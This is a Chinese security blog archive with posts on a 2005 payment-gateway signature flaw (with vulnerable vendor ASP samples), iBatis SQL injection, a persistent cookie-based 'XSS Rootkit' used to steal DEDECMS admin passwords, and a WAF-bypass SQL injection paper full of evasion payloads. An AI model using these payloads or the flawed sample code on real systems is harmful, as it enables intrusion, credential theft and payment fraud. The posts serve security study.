分类目录归档:信息安全

云网在线支付漏洞初探【2005】

理解这个漏洞呢,首先要了解一下在线支付的流程,这里引用一下云网官方的流程图:

正常的在线支付过程呢,是从第一步到第六步!
而这个漏洞所出现的地方就是在第二步,然后绕过了第三步和第四步、第五步,而直接把返回信息提交给了支付成功返回页面!
我们在动画里也只是看到了!它只有一个提交页面和网站上的一个支付成功页面,根本没有通过网关进行支付操作,所以钱也就没进入到银行里,这里也就不存在什么影响银行安全什么了,纯粹是骗人的了!
为什么会这样呢!问题出在云网提供给商户的支付接口文件上,让我们来看看这两个云网提供给商户的接口文件: 
〈%
’*******************************************
’文件名:SendOrder.asp
’主要功能:该示范程序主要完成将商户订单信息提交至云网支付网关的功能
’版本:v1.6(Build2005-05-24)
’描述:假设商户的订单系统都已完成,本页面主要是帮助商户按照云网支付网关要求的格式将订单信息提交至云网支付@网的支付接口,进行支付操作
’版权所有:北京云网无限网络技术有限公司
’*******************************************

’—订单信息—
  Dim c_mid      ’商户编号,在申请商户成功后即可获得,可以在申请商户成功的邮件中获取该编号
  Dim c_order      ’商户网站生成的订单号,不能重复
  Dim c_name      ’商户订单中的收货人姓名
  Dim c_address    ’商户订单中的收货人地址
  Dim c_tel      ’商户订单中的收货人电话
  Dim c_post      ’商户订单中的收货人邮编
  Dim c_email      ’商户订单中的收货人Email
  Dim c_orderamount  ’商户订单总金额
  Dim c_ymd      ’商户订单的产生日期,格式为”yyyymmdd”,如20050102
  Dim c_moneytype    ’支付币种,0为人民币
  Dim c_retflag    ’商户订单支付成功后是否需要返回商户指定的文件,0:不用返回 1:需要返回
  Dim c_paygate    ’如果在商户网站选择银行则设置该值,具体值可参见《云网支付@网技术接口手册》附录一;如果来云网支付@网选择银行此项为空值。
  Dim c_returl    ’如果c_retflag为1时,该值代表支付成功后返回的文件的路径
  Dim c_memo1      ’商户需要在支付结果通知中转发的商户参数一
  Dim c_memo2      ’商户需要在支付结果通知中转发的商户参数二
  Dim c_signstr    ’商户对订单信息进行MD5签名后的字符串
  Dim c_pass      ’支付密钥,请登录商户管理后台,在帐户信息-〉基本信息-〉安全信息中的支付密钥项
  Dim notifytype    ’0普通通知方式/1服务器通知方式,空值为普通通知方式
  Dim c_language    ’对启用了国际卡支付时,可使用该值定义消费者在银行支付时的页面语种,值为:0银行页面显示为中文/1银行页面显示为英文

  c_mid    = “000103”
  c_order    = “12345”
  c_name    = “张三”
  c_address  = “北京市朝阳区XX”
  c_tel    = “010-12345678”
  c_post    = “100001”
  c_email    = “zhangsan@test.com”
  c_orderamount  = “0.01”
  c_ymd    = “20050102”
  c_moneytype  = “0”
  c_retflag  = “1”
  c_paygate  = “”
  c_returl  = “http://www.xxx.com/xxx/xxx.asp”  ’该地址为商户接收云网支付结果通知的页面,请提交完整文件名
  c_memo1    = “ABCDE”
  c_memo2    = “12345”
  c_pass    = “Test”
  notifytype  = “0”
  c_language  = “0”

  srcStr = c_mid & c_order & c_orderamount & c_ymd & c_moneytype & c_retflag & 

c_returl & c_paygate & c_memo1 & c_memo2 & notifytype & c_language & c_pass
  ’说明:如果您想指定支付方式(c_paygate)的值时,需要先让用户选择支付方式,然后再根据用户选择的结果在这里进行MD5加密,也就是说,此时,本页面应该拆分为两个页面,分为两个步骤完成。
  
’—对订单信息进行MD5加密

  c_signstr  = MD5(srcStr)

%〉
〈table width=”85%” border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″〉
 〈tr〉
 〈td align=”center”〉 
 〈form name=”payForm1″ action=”https://www.cncard.net/purchase/getorder.asp” method=”POST”〉
      〈input type=”hidden” name=”c_mid” value=”〈%=c_mid%〉”〉
      〈input type=”hidden” name=”c_order” value=”〈%=c_order%〉”〉
      〈input type=”hidden” name=”c_name” value=”〈%=c_name%〉”〉
      〈input type=”hidden” name=”c_address” value=”〈%=c_address%〉”〉
      〈input type=”hidden” name=”c_tel” value=”〈%=c_tel%〉”〉
      〈input type=”hidden” name=”c_post” value=”〈%=c_post%〉”〉
      〈input type=”hidden” name=”c_email” value=”〈%=c_email%〉”〉
      〈input type=”hidden” name=”c_orderamount” value=”〈%=c_orderamount%〉”〉
      〈input type=”hidden” name=”c_ymd” value=”〈%=c_ymd%〉”〉
      〈input type=”hidden” name=”c_moneytype” value=”〈%=c_moneytype%〉”〉
      〈input type=”hidden” name=”c_retflag” value=”〈%=c_retflag%〉”〉
      〈input type=”hidden” name=”c_paygate” value=”〈%=c_paygate%〉”〉
      〈input type=”hidden” name=”c_returl” value=”〈%=c_returl%〉”〉
      〈input type=”hidden” name=”c_memo1″ value=”〈%=c_memo1%〉”〉
      〈input type=”hidden” name=”c_memo2″ value=”〈%=c_memo2%〉”〉
      〈input type=”hidden” name=”c_language” value=”〈%=c_language%〉”〉
      〈input type=”hidden” name=”notifytype” value=”〈%=notifytype%〉”〉
      〈input type=”hidden” name=”c_signstr” value=”〈%=c_signstr%〉”〉
      〈input type=”submit” name=”submit” value=”点击 -〉 云网支付@网”〉
 〈/form〉
  〈/td〉
 〈/tr〉
〈/table〉

这个是向云网网关提交订单信息的页面中的一些关键的代码!注意下他这个变量:c_signstr,
以及他的生成方式,是订单的几个信息连接后再md5加密后生成验证签名的!而这个签名是一个关键
但是从下面的提交表单可以看到,他们都是以明文的方式来提交的!当然要用明文了,如果加密的话,在后面就该出问题了!

下面我们来看订单成功后获取银行返回的成功信息的页面代码: 
〈%
’*******************************************
’文件名:GetPayNotIFy.asp
’主要功能:该示范程序主要完成接收云网支付网关支付通知信息,验证信息有效性,判断支付结果功能
’版本:v1.6(Build2005-05-24)
’说明:
’  1.本页面请不要使用诸如response.redirect等页面转向的语句
’  2.请直接将订单处理结果以HTML代码的形式输出在本页,云网支付网关会采用技术手段获取您的输出结果
’  3.本页面如果含有图片、样式或链接,请将路径或地址包括域名,比如〈img src=”/pic/15/a2005-12-21-580a.gif”〉
’版权所有:北京云网无限网络技术有限公司
’*******************************************

’—获取云网支付网关向商户发送的支付通知信息(以下简称为通知信息)
c_mid      = request(“c_mid”)      ’商户编号,在申请商户成功后即可获得,可以在申请商户成功的邮件中获取该编号
c_order      = request(“c_order”)    ’商户提供的订单号
c_orderamount  = request(“c_orderamount”)  ’商户提供的订单总金额,以元为单位,小数点后保留两位,如:13.05
c_ymd      = request(“c_ymd”)      ’商户传输过来的订单产生日期,格式为”yyyymmdd”,如20050102
c_transnum    = request(“c_transnum”)    ’云网支付网关提供的该笔订单的交易流水号,供日后查询、核对使用;
c_succmark    = request(“c_succmark”)    ’交易成功标志,Y-成功 N-失败      
c_moneytype    = request(“c_moneytype”)  ’支付币种,0为人民币
c_cause      = request(“c_cause”)    ’如果订单支付失败,则该值代表失败原因    
c_memo1      = request(“c_memo1”)    ’商户提供的需要在支付结果通知中转发的商户参数一
c_memo2      = request(“c_memo2”)    ’商户提供的需要在支付结果通知中转发的商户参数二
c_signstr    = request(“c_signstr”)    ’云网支付网关对已上信息进行MD5加密后的字符串

’—校验信息完整性—
IF c_mid=”” or c_order=”” or c_orderamount=”” or c_ymd=”” or c_moneytype=”” or

 c_transnum=”” or c_succmark=”” or c_signstr=”” THEN
response.write “支付信息有误”
response.end
END IF

  ’—将获得的通知信息拼成字符串,作为准备进行MD5加密的源串,需要注意的是,在拼串时,先后顺序不能改变
    Dim c_pass  ’商户的支付密钥,登录商户管理后台(https://www.cncard.net/admin/),在管理首页可找到该值
    c_pass = “Test”
    
    srcStr = c_mid & c_order & c_orderamount & c_ymd & c_transnum & c_succmark 

& c_moneytype & c_memo1 & c_memo2 & c_pass

  ’—对支付通知信息进行MD5加密
    r_signstr  = MD5(srcStr)

  ’—校验商户网站对通知信息的MD5加密的结果和云网支付网关提供的MD5加密结果是否一致
    IF r_signstr〈〉c_signstr THEN
      response.write “签名验证失败”
      response.end
    END IF

  ’—校验商户编号
    Dim MerchantID  ’商户自己的编号
    IF MerchantID〈〉c_mid THEN
      response.write “提交的商户编号有误”
      response.end
    END IF

  ’—校验商户订单系统中是否有通知信息返回的订单信息
    Dim conn  ’商户系统的数据链接
    sql=”select top 1 数据列 from 商户的订单表 where 商户订单号=”& c_order
    set rs=server.CreateObject(“adodb.recordset”)
    rs.open sql,conn
    IF rs.eof THEN
      response.write “未找到该订单信息”
      response.end
    END IF

  ’—校验商户订单系统中记录的订单金额和云网支付网关通知信息中的金额是否一致
    Dim r_orderamount  ’商户自己系统记录的订单金额
    r_orderamount=rs(“订单金额”)  ’商户从自己订单系统获取该值
    IF ccur(r_orderamount)〈〉ccur(c_orderamount) THEN
      response.write “支付金额有误”
      response.end
    END IF

  ’—校验商户订单系统中记录的订单生成日期和云网支付网关通知信息中的订单生成日期是否一致
    Dim r_ymd  ’商户自己系统记录的订单生成日期
    r_ymd=rs(“订单生成日期”)  ’商户从自己订单系统获取该值
    IF r_ymd〈〉c_ymd THEN
      response.write “订单时间有误”
      response.end
    END IF

  ’—校验商户系统中记录的需要在支付结果通知中转发的参数和云网支付网关通知信息中提供的参数是否一致
    Dim r_memo1  ’商户自己系统记录的需要在支付结果通知中转发的参数一
    r_memo1 = rs(“转发参数一”)
    Dim r_memo2  ’商户自己系统记录的需要在支付结果通知中转发的参二
    r_memo2 = rs(“转发参数二”)
    IF r_memo1〈〉c_memo1 or r_memo2〈〉c_memo2 THEN
      response.write “参数提交有误”
      response.end
    END IF

  ’—校验返回的支付结果的格式是否正确
    IF c_succmark〈〉”Y” and c_succmark〈〉”N” THEN
      response.write “参数提交有误”
      response.end
    END IF

  ’—根据返回的支付结果,商户进行自己的发货等操作
    IF c_succmark=”Y” THEN
      ’根据商户自己商务规则,进行发货等系列操作
    END IF
%〉

我们可以看到他的验证签名的方式,是将银行反馈过来的信息链接后和在提交页面提交的信息,
先看签名是如何验证的: 
  ’—将获得的通知信息拼成字符串,作为准备进行MD5加密的源串,需要注意的是,在拼串时,先后顺序不能改变
    Dim c_pass  ’商户的支付密钥,登录商户管理后台(https://www.cncard.net/admin/),在管理首页可找到该值
    c_pass = “Test”
    
    srcStr = c_mid & c_order & c_orderamount & c_ymd & c_transnum 

& c_succmark & c_moneytype & c_memo1 & c_memo2 & c_pass

  ’—对支付通知信息进行MD5加密
    r_signstr  = MD5(srcStr)

  ’—校验商户网站对通知信息的MD5加密的结果和云网支付网关提供的MD5加密结果是否一致
    IF r_signstr〈〉c_signstr THEN
      response.write “签名验证失败”
      response.end
    END IF
是通过提交的这些信息加密后来验证的,而商户的支付密钥,我们可以在提交页面获取到!而这里他程序需要添加上去的!
我们就不需要了,我们需要的只是让r_signstr等于c_signstr 就可以搞定它了!欺骗方法我就不说了!
至于其他的欺骗,不存在加密了,全部明文的了!很容易就过去了! 
ps:这个作者当时还发了一个别的也是在线支付漏洞的动画,我看都没有看就删了.你信这个动画吗?反正我是不信!

IBatis.Net框架与SQL注入

主要由于sqlmaps配置文件中符号$与#解析不同引起:

防止sql注入iBatis模糊查询

http://developer.51cto.com/art/200907/139144.htm

iBatis解决sql注入

http://www.cnblogs.com/aaa6818162/archive/2011/05/21/2052759.html

ibatis的sql注入,证实了我此前的想法
http://blog.csdn.net/oswin_jiang/article/details/4242431

关于Ibatis 的自动防止sql注入

http://blog.csdn.net/yangqillohe/article/details/4139265


深掘XSS漏洞场景之XSS Rootkit[完整修订版]

EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2011-10-15
 
0x00 前言
 
众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为两种持久型和非持久型:
 
1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。
 
2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客可以用XSS内容经正常功能进入数据库持久保存。

3. DOM XSS漏洞,也分为持久和非持久型两种,多是通过javascript DOM接口获取地址栏、referer或编码指定HTML标签内容造成。
 
一般持久型XSS漏洞比非持久型XSS漏洞风险等级高,从漏洞的本质上来说这是没错的,但漏洞的利用仍然需要看场景,有时候更深入的看待场景能够挖掘出意想不到的东西,大家接着往下看。

 
0x01 漏洞场景解析
 
首先我给出一段PHP分页的XSS漏洞的简单代码:
 
demo.php————————————————————-
 <?php
 foreach(Array('_GET','_POST','_cookie') as $_request)
 {
 foreach($$_request as $_k => $_v) ${$_k} = $_v;
 }
 ?>
 
<a href="<? echo $_SERVER["PHP_SELF"]; ?>?i=<? echo $id;?>">分页</a>
 ———————————————————————
 
这段PHP代码中模拟register_globals是Web程序中常见的,代码中输出了网页的分页链接这个也是常见的,因为忽略了对传入数据的效验,更产生了最常见的XSS漏洞。
 
下面是这个XSS漏洞的验证方法:
 http://127.0.0.1/demo.php?id=1"><script>alert(1)</script>
 
GET方法在id参数中传入HTML内容,导致网页内容中的herf闭合,执行script标签里的脚本内容:
 
<a href="/demo.php?id=1"><script>alert(1)</script>">分页</a>
 
这是一个典型的非持久型XSS漏洞,在常规的思维逻辑下,这个漏洞到这里基本就打止了,本文也马上要变为普通的科普文了,然而事实并没有那么简单,这个漏洞场景再深入挖掘,就牵出了本文的重头戏。

0x02 XSS Rootkit实现方法
 
我们知道操作系统有Rootkit这样的内核后门,Rootkit最大的特性之一就是隐蔽,普通的安全软件无法检测出系统中运作着Rootkit,以保证Rootkit后门能长久存活于系统中,而Web程序的漏洞很难达到这一效果,而我发现某些特定场景的XSS漏洞能够达到这一效果。

现今流行的PHP Web程序的都喜欢自己模拟register_globals(全局变量注册)这一特性,通过GET、POST、cookie等方法注册变量(本文下面的内容都简称GPC),通过GPC直接注册变量方便整个程序的运作,而本文的重点即是围绕这一点来展开的。

第一部分的我模拟的XSS漏洞即是一个典型的全局变量注册的场景,demo.php不仅可以GET传参,还能接受cookie传参,变量注册顺序是GPC,由于注册变量的流程是一个foreach循环,所以通过GP注册变量最后能被C覆盖,而cookie是客户端浏览器的持久化数据,如果通过XSS漏洞设置cookie,我们完全可以把这个典型的非持久型XSS漏洞变成持久的,说到这里大家一定感觉非常兴奋了,我就来实际测试一下:
 
先写出一段设置cookie的javascript代码
 
Persistence_data='"><script>alert(/xss/)</script>';
var date=new Date();
var expireDays=365; //设置cookie一年后失效
date.setTime(date.getTime()+expireDays*24*3600*1000);
document.cookie='id='+Persistence_data+';expires='+date.toGMTString(); //设置cookie的id参数值为XSS代码
 
把设置cookie的javascript代码编码一次,放入XSS URL中,这样防止魔术引号和不同浏览器编码的未知情况影响我们的测试,关闭IE8/9等XSS筛选器后,我们访问下面的URL让XSS生效。
 
http://127.0.0.1/demo.php?id=1"><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,47,41,60,47,115,99,114,105,112,116,62,39,59,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,105,100,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59))</script>

 
结果令人非常满意,当我们关闭浏览器乃至关闭重启电脑后,再重新访问下面的网页:

无论是访问http://127.0.0.1/demo.php

还是访问http://127.0.0.1/demo.php?id=1

我们的XSS代码都会生效,同时如果客户端未清理cookie,这个XSS漏洞将有效一年的时间,达到了Rootkit隐蔽和能够持久存活的效果。

0x03 XSS Rootkit实战

DEDECMS后台登陆主页的模板中有个gotopage变量存在XSS漏洞,代码如下:

dede\templets\login.htm

65行左右

<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />

DEDECMS核心代码中,模拟全局变量注册机制的顺序是GPC,也就是C能够覆盖GP所注册的变量。

我们再套用0X02的代码测试,可以在cookie中持久化保存gotopage变量,如果管理员触发过我们的XSS漏洞,我们就能在管理员的cookie中持久化保存gotopage变量,将gotopage隐藏表单值变为我们的任意脚本内容,以后管理员只要是访问后台页面都会触发XSS漏洞,我们完全可以劫持管理员的整个登陆过程,悄无声息的直接获取管理员的密码。

当然DEDECMS这个漏洞的如何灵活运用更取决于黑客的发散思维,比如IE8/9等会拦截URL XSS,我们可以利用一个持久型的XSS或DOM XSS做为这类XSS Rootkit漏洞的payload,另外cookie的设置不限于同源策略,在任意子域名设置的cookie,可以让整个域名的应用都接受这个cookie,黑客可以脱离于DEDECMS程序本身的限制,在整个网站架构上的薄弱点攻击DEDECMS的后台。

0x04 深入XSS Rootkit场景

在PHP全局变量注册机制的场景下,调整GPC的注册变量的顺序可以减弱XSS Rootkit攻击效果,如discuz程序:

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
 foreach($$_request as $_key => $_value) {
  $_key{0} != '_' && $$_key = daddslashes($_value);
 }
}

注册变量的顺序是CPG,我们的C始终都不能覆盖GP所注册过的变量,不过程序的某个流程导致变量未初始化,还是能产生XSS Rootkit效果,如

http://xx.163.com/logging.php?action=logout&referer=javascript:alert()&formhash=rootkit

在DISCUZ程序的退出代码存在一个XSS漏洞,在用户没有登陆的情况下,退出代码中的referer变量没有初始化,导致我们能任意控制这个变量。

在这个情况下我们不用担心CPG的注册顺序问题,但我们需要构造特定的URL,造成变量未初始化的情况才能触发XSS漏洞,这样XSS Rootkit攻击效果就大打折扣了,用户在登陆后的正常退出操作是不能触发我们的XSS漏洞的,已脱离了XSS Rookit的优势。

另外一个场景是滥用request类变量的情况,在不同脚本和服务器环境中request类变量的效果可能不同,如在我之前的《浅谈绕过WAF的数种方法》提到了asp/asp .net等request类变量有复参特性,所以gpc的内容都能同时进入注册变量,也可能会产生XSS Rootkit漏洞的情况。

最后还有一类特殊的DOM XSS情况,80sec的成员疯狗在几年前发现过,某大型网站的主页读取COOKIE中的用户ID在网页中显示并没有进行HTML编码,导致一个XSS漏洞即可在主页中安装XSS Rookit。

当然还有更多的场景,在剑心的《web应用程序中的rootkit》也都有提过,XSS Rootkit的场景我就解读到这里了,更多的场景就留给大家思维发散了。

 
0x05 后话

至此我们用非持久型XSS漏洞完成了一次到XSS Rootkit的转变,再一次揭示了漏洞的场景有多么重要,深掘漏洞场景完成一次本质的升华是多么美妙的事情。

程序员需要重视程序安全的每一个细节,任何一个不起眼的漏洞都可能会造成意想不到的危害。
 
一些web漏洞扫描器报告中提示非持久型XSS漏洞标为高危漏洞,普遍存在争议的情况,可以根据本文做参考,对场景再深入挖掘来定义风险,那么本文最重要的目的也就达到了。

0x06 参考

跨站脚本漏洞导致的浏览器劫持攻击
http://www.80sec.com/browser-hijacking.html

web应用程序中的rootkit
http://www.80sec.com/webapp-rootki.html

浅谈绕过WAF的数种方法
http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html
 

绕过WAF过滤的方法,防注入新挑战

Beyond SQLi: Obfuscate and Bypass

from:http://www.friddy.cn/article.asp?id=128

|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[  By CWH Underground  ]=--------------------=|
|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: Beyond SQLi: Obfuscate and Bypass
Author	: "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date	: 2011-10-06


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Filter Evasion (Mysql)

		[0x01a] - Bypass Functions and Keywords Filtering
		[0x01b] - Bypass Regular Expression Filtering
		
  [0x02] - Normally Bypassing Techniques

  [0x03] - Advanced Bypassing Techniques

		[0x03a] - HTTP Parameter Pollution: Split and Join
		[0x03b] - HTTP Parameter Contamination
  		
  [0x04] - How to protect your website

  [0x05] - Conclusion

  [0x06] - References

  [0x07] - Greetz To


#######################
 [0x00] - Introduction
#######################

	Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on. 
This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection. 
There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system 
in the real world even though you spend more than 300,000 USD on a WAF.

	This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.

	Section 0x01, we give a details of how to bypass filter including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution. 
The last, section 0x05, It's conclusion from Section 0x01-0x04.


#################################
 [0x01] - Filter Evasion (Mysql)
#################################
	
	This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions. 
This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.

	+++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01a] - Bypass Functions and Keywords Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++++++
	
		Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful. 
	However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users 
	when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.

		
		Keyword filer: 		and, or
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or)/i', $id)

		THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

		Filtered injection:	1 or 1 = 1		1 and 1 = 1
		Bypassed injection:	1 || 1 = 1		1 && 1 = 1
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union)/i', $id)

		The keyword union is generally used to generate an malicious statement in order to select extra data from the database. 

		Filtered injection:	union select user, password from users
		Bypassed injection:	1 || (select user from users where user_id = 1) = 'admin'

		** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement 
		e.g. use substring function to get each character of table names.
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where)/i', $id)
		Filtered injection:	1 || (select user from users where user_id = 1) = 'admin'
		Bypassed injection:	1 || (select user from users limit 1) = 'admin'
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where, limit
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit)/i', $id)
		Filtered injection:	1 || (select user from users limit 1) = 'admin'
		Bypassed injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by)/i', $id)
		Filtered injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		Bypassed injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where, limit, group by, select
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
		Filtered injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || 1 = 1 into outfile 'result.txt'
		Bypassed injection:	1 || substr(user,1,1) = 'a'
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, '
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
		Filtered injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || user_id is not null
		Bypassed injection:	1 || substr(user,1,1) = 0x61
		Bypassed injection:	1 || substr(user,1,1) = unhex(61)
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = unhex(61)
		Bypassed injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex, substr
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		Bypassed injection:	1 || lpad(user,7,1)
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex, substr, white space
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
		Filtered injection:	1 || lpad(user,7,1)
		Bypassed injection:	1%0b||%0blpad(user,7,1)
		----------------------------------------------------------------------


		From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions. 
	Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.

		Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.


	+++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01b] - Bypass Regular Expression Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++

		Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server. 
	However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.

	PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols. 

	[Code]---------------------------------------------------------------		
	filtered injection:		1 or 1 = 1
	Bypassed injection:		1 or 1
	[End Code]----------------------------------------------------------- 

	[Code]---------------------------------------------------------------		
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name = 'users'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
	Bypassed injection:		1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
	Bypassed Injection:		1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
	[End Code]----------------------------------------------------------- 



########################################
 [0x02] - Normally Bypassing Techniques
########################################

	In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?
	
	A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. 
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, 
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
	WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers.
Some modern WAF systems work both with attack signatures and abnormal behavior.

	Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!

	
	1. Bypass with Comments

		SQL comments allow us to bypass a lot of filtering and WAFs.
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
		[End Code]-----------------------------------------------------------


	2. Case Changing

		Some WAFs filter only lowercase SQL keyword.	

		Regex Filter: /union\sselect/g
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UnIoN/**/Select/**/1,2,3--
		[End Code]-----------------------------------------------------------


	3. Replaced keywords

		Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.	
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
		[End Code]-----------------------------------------------------------

		Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.

		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
		[End Code]-----------------------------------------------------------

		For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/".

		Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
		Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
	


	4. Character encoding

		Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so 
		double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep
		decoding the SQL statement executing
	
		[Code]-----------------------------------------------------------------------------------------------------------------
		http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
		[End Code]-------------------------------------------------------------------------------------------------------------
				
		Moreover, these techniques can combine to bypass Citrix Netscaler
			- Remove all "NULL" words
			- Use query encoding in some parts
			- Remove the single quote character "'"
			- And Have fun !!
			Credit: Wendel Guglielmetti Henrique	
		
